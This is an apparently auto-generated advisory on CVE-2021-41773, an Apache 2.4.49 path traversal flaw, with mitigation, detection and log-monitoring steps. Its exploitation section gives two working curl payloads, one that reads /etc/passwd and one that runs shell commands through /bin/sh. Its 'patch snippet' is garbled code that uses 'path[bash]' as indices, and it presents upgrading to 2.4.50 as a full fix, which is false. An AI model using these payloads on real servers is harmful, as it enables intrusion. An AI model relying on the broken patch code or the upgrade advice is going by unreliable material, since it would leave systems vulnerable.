How the CVE Works:
CVE-2021-41773 is a path traversal vulnerability in Apache HTTP Server 2.4.49. The flaw arises due to improper validation of URLs in the `ap_normalize_path()` function. Attackers can exploit this by sending crafted HTTP requests containing directory traversal sequences (../). If `mod_cgi` is enabled, this could allow remote code execution (RCE) by escaping the document root and accessing arbitrary files. The vulnerability is exploitable when the server is configured with Require all granted, exposing sensitive data or enabling command injection.
DailyCVE Form:
Platform: Apache HTTP Server
Version: 2.4.49
Vulnerability: Path Traversal
Severity: Critical
Date: 2021-10-04
What Undercode Say:
Exploitation:
1. Craft a malicious request:
curl -v "http://target.com/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd"
2. If `mod_cgi` is active, execute commands:
curl -v "http://target.com/cgi-bin/.%2e/%2e%2e/bin/sh" -d "echo;id"
Mitigation:
1. Update to Apache 2.4.50 or later.
2. Disable `mod_cgi` if unused.
3. Restrict directory permissions:
<Directory "/"> Require all denied </Directory>
Detection:
Scan for vulnerable servers using:
nmap -p 80,443 --script http-vuln-cve2021-41773 <target>
Patch Analysis:
Apache’s fix in 2.4.50 adds strict path normalization:
// Patch snippet from server/util.c
if ((path == '/') && (path[bash] == '.') && (path[bash] == '.') && (path[bash] == '/')) {
return HTTP_BAD_REQUEST;
}
Log Monitoring:
Check for traversal attempts in logs:
grep "%2e%2e" /var/log/apache2/access.log
Workaround:
Use ModSecurity rules:
SecRule REQUEST_URI "@contains %2e%2e" "deny,log,status:403"
References:
Sources:
Reported By: www.cve.org
Extra Source Hub:
Undercode
